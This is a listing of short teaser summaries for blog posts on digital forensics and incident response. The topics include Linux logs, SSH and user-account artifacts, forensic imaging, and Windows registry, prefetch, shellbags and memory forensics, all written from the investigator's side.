Linux was designed to be used as multi-user operating systems. To blend in with legitimate users, attackers may also create malicious user accounts which provide backdoor access to the system, whenever the attacker wants. When a Linux computer is suspected to be involved in an incident, one of the important activities to perform is to enumerate the list of users and groups on the system. It helps to identify any user accounts that stand out as an anomaly. In this blog post, we will discuss some concepts surrounding user account enumeration on Linux systems.
Digital Forensics (51)
Every Linux computer would be connected to the Internet at some point. When a Linux computer is suspected to be involved in an incident, it is critical to collect network artifacts and interpret the recent networking activity that had taken place on the system. In this blog post, we will discuss some crucial network artifacts that can be collected from a Linux system.
You are a junior digital forensic analyst. You have heard that digital forensic professionals need to have the ability to write scripts quickly, to deal with the large amount of data in an investigation. You can write basic scripts, but you constantly wonder, ‘What kind of script will I be asked to write while helping out with an investigation?’. You want to be better prepared to write scripts in the field. This blog post presents four scenarios that requires a digital forensic analyst to write scripts.
Yes, ‘systemd’ – you read that right. It’s not a typo. On most modern Linux distributions, systemd is the software suite that is responsible for bringing up critical system processes and system services. It plays a major role in booting up the operating system. One of the components of systemd is a journal that logs information about a lot of activity on the system. In this blog post, we will discuss some facts about the Linux systemd journal and how it plays an important role in Digital Forensics.
In the previous blog post we saw how a forensic image can be mounted on Linux. Typically, forensic investigations are time bound and forensic images carry a lot of data. We can use powerful Linux commands to quickly gather information about the files/directories on a forensic image. In this blog post, we will see how find command can be used to process the contents of a forensic image.
In the previous blog post, we saw how a Linux computer can be used to acquire forensic images. Once an image has been acquired, how do we view and process the contents of the forensic image? It can be done using the various tools available and also using existing Linux commands. In this blog post, we will explore how the mount command can be used to view the contents of a forensic image.
Data is the major driving factor behind businesses worldwide. This data is stored in digital form by the organizations. Data is the most valuable asset of an organization as well as the prime target for attackers. This data is continuously being transferred over the internet which makes it possible for the attackers to compromise its security. The organization may suffer serious repercussions if the security of this data is compromised.
A forensic image is an exact replica of a hard disk or a hard disk partition made during a digital forensic investigation. There are various commercial and free tools available to acquire forensic images on Windows and Linux computers. Once you understand the basic concepts surrounding forensic images and practice how they can be acquired, you can be ready to help out during an investigation. In this blog post, we will discuss how Linux computers can be used to acquire a forensic image.
On your Windows computer, the hard disk that contains the operating system files and user files is typically mounted at C:. The term mount refers to a storage media like hard disk, USB drive or CD-ROM; being placed in a usable state – for a user to create and modify files. When a USB drive is attached, it is typically mounted at D: or E:. Likewise, on a Linux computer, apart from the hard disk that stores system information, when external storage media are connected to the computer, they are typically mounted in the media/ directory. In this blog post, we will discuss the forensic importance of artifacts created by mounted devices on a Linux system.
When you visit a person’s home, you get to know about their interests, hobbies, everyday activities, etc. Likewise, within a user’s home/ directory on a Linux system, you can find many forensic artifacts that are indicative of that user’s recent activity on the system. In this blog post, we will explore some of the crucial artifacts within a user’s home/ directory.
When using Linux systems in an environment, it is highly likely that you will remotely login to a machine over SSH. Using SSH is also a common technique for cyber adversaries to gain access or pivot into machines on the network. Every interaction via SSH leaves some artifacts on a system. In this blog post, we will discuss where SSH related artifacts are present on a Linux system and how they may be useful during an investigation.
An organization’s own personnel pose one of the biggest threats to its security. Human error or negligence tends to be the leading cause of data breaches in an organization. A threat that can be particularly severe for the organization, aside from those brought on by gross negligence, is that posed by a malicious insider. Compared to external threats like hackers, internal threats to the company can have much more catastrophic repercussions. The basics of insider threats, their types, their impact on the organization, and the tactics for detection and prevention are covered in this article.
Every file on a Linux computer has four timestamps associated with it. In this blog post, we will explore how those timestamps exist, some interesting facts surrounding the timestamps and their implications in DFIR.
Every DFIR professional requires a forensic lab ready with various tools that can assist with handling incidents. Some software tools may need to be installed by the professional manually on their workstation. For example: tools that can process forensic images, hex file viewer/editor, log analysis tools, etc. There are some Linux distributions that come pre-installed with tools to assist in DFIR activities. This blog post gives a brief overview of some Linux distros for DFIR.
We use the Terminal application on Linux systems regularly to type powerful commands to interact with the system, alter the behaviour of the system, work with files/directories, etc. The Terminal uses Linux shells in the backend to receive commands from the user, interact with the system and display relevant results to the user. Linux systems are configured by default to store a history of the commands typed by the user, also referred to as shell history. In this blog post, we will see how shell history is useful in DFIR activities and how this capability can be best tuned for pre-incident preparation.
Every Linux system generates numerous logs by default, as it is being used. A DFIR professional is in a better position to handle an incident involving a Linux system, if they are aware of the various sources of logs, their locations and how the logs can be processed. This blog post highlights the various sources of logs in Linux systems.
As a Criminalist, which of the following actions would you take to preserve computer-based evidence?
The use of Linux systems is increasing every day – in personal computers, servers, IoT devices, etc. When cyber incidents occur, professionals capable of performing forensics on Linux systems are in great demand. It would be a great idea to include ‘Ability to perform Linux Forensics’ in your skill set. Are you wondering how to get started? This blog post will give you a brief introduction to performing Linux forensics.
When you pick a book to read, you would first read the title and a short summary about the book, before diving into the actual content. In the same way, in forensic investigations it is recommended to have an idea about the system you are working with before proceeding to collect evidence from it. This blog post highlights the information to be collected from a Linux system before proceeding with DFIR tasks during an investigation.
When you want a glass of water, you will head over to your kitchen to get it. You know the layout of your house, you know that the kitchen would have water – so you navigate there to get what you need. In the same way, to be able to perform Linux Forensics, it would be great to know about the layout of files on a Linux system and have an idea about where critical log files are stored. This blog post introduces you to the main directory structure on Linux systems. Knowing what information is held within the various directories will help a forensic examiner know where to look, while searching for evidence.
Have you watched movies where skilled cyber operators have black windows open in their computers, with coloured text scrolling through? They type some content in the black screens and magical stuff happens. Have you wondered how they go about doing all that? What applications may they be using? All those tasks can be performed on Windows, Linux-based and Mac operating systems. For now, let us focus on the Linux-based ones. This blog post introduces some basic concepts about Linux-based computers and discusses how Linux proves useful in the DFIR domain.
There is a command like tool called ‘strings’ that helps to extract the text strings from any file. ‘strings’ is one of the most important tools every digital forensic professional must know about. This blog post discusses about the working of ‘strings’ utility and its significance in DFIR.
Windows Recycle Bin Forensics can be likened to dumpster diving. One of the best places to look for evidence is in the trash. Every time a user deletes a file, it lands up in the Recycle Bin, which is the trash area for Windows Operating systems. This blog post discusses how files exist within the Recycle Bin and how digital forensics can be performed on it.
Every DFIR professional must have the ability to perform memory forensics. This includes acquiring memory dumps, processing a memory dump for evidence and drawing conclusions for an investigation. Sometimes processing a memory dump is not a straightforward process. The investigator may have to perform some preliminary steps. This blog post discusses one of the preliminary steps which is sometimes performed before processing a memory dump for evidence.
Hashing is a digital fingerprinting technique used to ensure the integrity of data. When data is hashed, a mathematical algorithm is used to generate a unique code that corresponds to the data. This code, called a hash, can be used to verify that the data has not been modified. If even one bit of the data is changed, the hash will be different. In this article, we explain the importance of hashing in digital forensics.
The best place to hide something is to hide it in plain sight – is a belief that crooks live by. Windows operating systems have a feature called Alternate Data Streams, abbreviated as ADS. The intention behind developing this feature was for technical advancements, but it has been misused to hide things in plain sight. This blog post gives you insight into Windows Alternate Data Streams – what is it, why was it introduced in the first place, how it has been misused and how it impacts DFIR.
Jane just purchased a new mobile phone. She enjoys describing about it to her friends – the color, form factor, storage capacity, RAM, etc. Everything that she is describing about the new phone are attributes. The English dictionary describes an attribute as a feature of a product. Most Windows computers, use NT File System for file management. Every file would have a name, timestamps, file owner, file size and its data. NTFS stores the various information relevant to a file, as file attributes. This blog post introduces you to the most important NTFS file attributes and describe why they are important for digital forensics.
Every time you use your Windows computer, you are navigating through many files and folders. When you open a folder for viewing, you may also modify its viewing preferences. Windows stores information about it. Think of it as a logging system for folder access. These logs are stored in Shellbags. This blog post will introduce you to Windows Shellbags and highlight their significance for digital forensics.
A friend tells you, ‘Hey I was downloading some animation software the other day and now my computer is acting up! I keep seeing these advertisements that my computer is infected by a virus and that I need to install a virus removal tool. What shall I do?’. You suspect that your friend may have inadvertently downloaded some malicious software. But where has this software come from? Since when has this abnormal activity been seen? This is when you put on your Web Browser Forensics hat and work your magic.
Digital Forensics relies on the power of timestamps and timelines. Windows operating systems that use NTFS or FAT file system for their storage media like hard disks, have a feature called File System Tunneling which influences how timestamps exist. This blog post discusses what file system tunneling is and its impact on digital forensics.
On Windows systems it is possible to schedule tasks to be completed at specific times or when specified triggers occur. This blog post discusses the significance of scheduled tasks in digital forensics.
One of the many log sources on windows computers are Event Logs. This blog post discusses what windows Event Logs are and their significance in digital forensics.
Are you wondering what Digital Forensics professionals do on a regular basis? This blog post will give you a brief idea about the activities typically performed by digital forensics professionals.
In a classroom, a teacher would have details of all the students who have enrolled in a particular course. Details about each student like student ID, name, enrolment date, etc. are stored in an organized way, probably within a table in a word document or a spreadsheet. Likewise, details about every file on your Windows computer are stored in an organized way by the Master File Table. This blog post gives you a brief introduction to the Windows Master File Table and its significance in digital forensics.
Windows operating system stores a lot of information about the activities performed by a user. Ranging from which binaries were executed, to how applications were used, to even storing information about which files/directories were created or deleted or modified recently. This blog post discusses about one log source called the $UsnJrnl file, which records information about every operation performed on files and directories.
Have you ever wondered how many files exist on your hard disk right now? Thousands. How does Windows operating system manage thousands of files efficiently? This blog post will give you a brief introduction to how Windows performs file management and its forensic significance.
‘Say cheese!’ You just took a photograph with all your friends. When you look at the photograph days or years later, you will remember the good memories you had when the picture was taken. Windows has a similar ‘photograph’ feature that helps you capture the state of files on the system, called Volume Shadow Copy Service. This blog post will walk you through the importance of volume shadow copies for digital forensics.
Think about a big dictionary! It is like a database of words listed along with multiple meanings, synonyms and antonyms for each. Likewise, Windows systems store configuration information in a database commonly referred to as the Windows Registry. This blog post will give you a brief idea about the registry and how it may be useful during a forensic investigation.
Some people write down events of their daily lives in a journal. Looking through the pages of the journal, gives a glimpse into how the person has lived over the years. A journal holds the timeline of a person’s life. Similarly, every time you use your computer, some data about your activity is stored in specific locations. Looking through that data gives a glimpse into how you have used your computer over time. This blog post tells you about the importance of timelines in a forensic investigation.
When you wake up in the morning, you can recall events of the previous day. You also have memories of events that happened over the last few days. In the same way, a Windows computer also has numerous ways to recall how it had been used recently. One way is by using a hibernation file. This blog post discusses how the Windows hibernation file is useful in digital forensics.
You are a Junior Digital Forensics Investigator. Your manager has asked you to get familiar with performing forensics on memory dumps. This blog post will give you a brief overview about the potential information you can find in a memory dump.
Have you always dreamed of being a Digital Forensics and Incident Response Professional? You are new to the field, you have been applying for jobs, but companies are demanding some experience in the field. You have decided to learn some skills by setting up your very own DFIR lab at home. This blog post will help you get started!
Memory forensics is the process of analyzing a computer’s memory dump for evidence of a compromise. This process can be used to identify malicious software, track down system intrusions, and recover deleted data. Memory forensics is a critical tool for incident response and digital forensics investigations.
When an x-ray of the human body is taken, the complete skeletal structure of a person can be seen. This structure defines how the human body exists. Similarly, all the files stored on your hard disk too have a special structure. This structure begins with a unique sequence of bytes referred to as file magic number. This blog post introduces you to the internal structure of files on disk and file magic numbers; and why you should know it for digital forensics.
“If you did not document it, it did not happen” – is a doctrine followed diligently by digital forensic investigators worldwide. This blog post discusses the importance of documentation in a forensic investigation and provides best practices on how to write reports.
Alice and Bob are going on a hike. As they walk through the woods, they notice that they are leaving behind footprints of their trail. They hope that these footprints will help track their way back when they return from the hike. Did you know that every application executed on a Windows machine leaves behind footprints of its activity? This blog post introduces the concept of Windows Prefetch files, which acts as one of the critical footprints about recent activity on a system.
Digital Forensics is the scientific process of uncovering the sequence of events that led to an incident. Timestamps clearly indicate the date and time when an event occurred on a system. This blog post discusses how timestamps are stored by three major operating systems: Windows, Linux-based and MacOS.
Have you wondered what the terms little-endian and big-endian mean? It refers to the ordering of data stored in memory. This blog post will highlight the difference between little-endian and big-endian systems.
A forensic image is an image created by a digital forensic examiner during the process of investigating a potential crime. This image is an exact replica of the original data, and can be used to identify and analyze digital evidence.
You have just taken up a role as a Junior Digital Forensic Analyst. You have been informed that your regular duties would involve searching for evidence on windows machines suspected of being compromised. If you knew what evidence to collect, when to collect it and how to collect it; then you will be in a great position to help your team with the investigation. This blog post will provide a high-level overview of the various sources of evidence on a windows machine and how they may prove useful during an investigation.
Let’s consider a scenario. The new Batman movie has just come out. You are unable to watch it in the theatres, so you head over to a website that says, “Download this software, you can watch the new Batman movie immediately!”. You download the software, only to find out it is fake. Disappointed, you carry on with your work. Soon after, you begin to notice that the mouse cursor moves across the screen, on its own, without you actually using the mouse. This is not expected behavior.